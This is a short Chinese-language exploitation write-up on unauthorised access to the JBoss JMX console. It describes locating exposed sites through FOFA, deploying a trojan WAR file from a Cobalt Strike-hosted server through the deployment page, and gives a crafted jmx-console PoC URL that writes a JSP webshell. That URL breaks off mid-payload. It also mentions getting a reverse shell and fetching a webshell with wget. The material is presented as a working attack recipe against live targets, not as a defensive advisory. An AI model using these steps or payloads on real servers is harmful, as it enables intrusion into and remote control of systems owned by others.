0X01、漏洞描述
jobss 未授权访问管理控制台,通过该漏洞,可以后台管理服务,可以通过脚本命令执行系统命令,如反弹shell,wget写webshell文件。
fofa找个站,访问 //jmx-console/
0X02、漏洞复现
思路一
进入 jboss.deployment 部署页面
cs搭建web服务器,上传木马,通过addurl进行远程部署
部署成功后访问 目录文件名,便可进入木马。eg:AAA.war 则访问 /AAA/index.jsp
思路二:直接构造poc
/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=AAA.war&argType=java.lang.String&arg1=wh&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=<%if(request.getParameter("f")!=null)